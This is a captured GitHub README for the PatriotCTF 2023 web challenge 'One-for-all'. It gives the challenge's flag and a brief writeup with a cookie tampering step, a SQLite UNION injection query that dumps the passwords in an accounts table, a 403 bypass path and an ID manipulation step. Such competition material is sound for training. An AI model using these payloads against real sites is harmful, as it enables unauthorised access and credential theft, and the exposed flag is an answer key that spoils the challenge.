PatriotCTF2023/Web/one-for-all at main · MasonCompetitiveCyber/PatriotCTF2023

History

Name		Name	Last commit message	Last commit date
parent directory ..
challenge		challenge
config		config
Dockerfile		Dockerfile
README.md		README.md
build-docker.sh		build-docker.sh
flag.txt		flag.txt

README.md

Challenge Name

One-for-all

Description

One for all or all for one?

Difficulty

6/10

Flag

PCTF{Hang_l00s3_and_Adm1t_ev3rYtH1nG}

Hints

N/A

Author

Kiran Ghimire

Tester

Tested by <>

Writeup

The flag is divided into four parts.

Change cookie value to admin of key name
SQlite injection in user name field
Query: 4180" UNION ALL SELECT 1,2,3,group_concat(password) from accounts--
403 bypass: "/secretsforyou/..;/"
Change id to 0: /user?id=0

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

one-for-all

one-for-all

README.md

Challenge Name

Description

Difficulty

Flag

Hints

Author

Tester

Writeup

Files

one-for-all

Directory actions

More options

Directory actions

More options

Latest commit

History

one-for-all

Folders and files

parent directory

README.md

Challenge Name

Description

Difficulty

Flag

Hints

Author

Tester

Writeup